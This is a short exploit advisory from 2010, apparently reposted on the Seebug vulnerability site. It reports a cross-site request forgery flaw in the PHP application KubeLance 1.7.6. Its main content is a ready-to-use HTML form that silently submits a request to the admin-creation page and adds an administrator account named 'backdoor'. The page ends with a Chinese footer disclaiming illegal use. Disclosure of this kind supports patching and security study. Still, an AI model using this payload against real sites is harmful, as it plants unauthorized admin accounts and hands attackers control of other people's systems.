[#-----------------------------------------------------------------------------------------------#] [#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability [#] Author: Milos Zivanovic [#] Email: milosz.security[at]gmail[dot]com [#] Date: 02. February 2010. [#-----------------------------------------------------------------------------------------------#] [#] Application: KubeLance [#] Version: 1.7.6 [#] Platform: PHP [#] Link: http://www.kubelabs.com/kubelance/ [#] Price: 90 $ [#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit) [#-----------------------------------------------------------------------------------------------#] KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user. [EXPLOIT------------------------------------------------------------------------------------------] <form action="http://localhost/kubelance/adm/admin_add.php" method="post"> <input type="hidden" name="username" value="backdoor"> <input type="hidden" name="password" value="another-admin-added"> <input type="submit" name="submit"> </form> [EXPLOIT------------------------------------------------------------------------------------------] [#]EOF
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论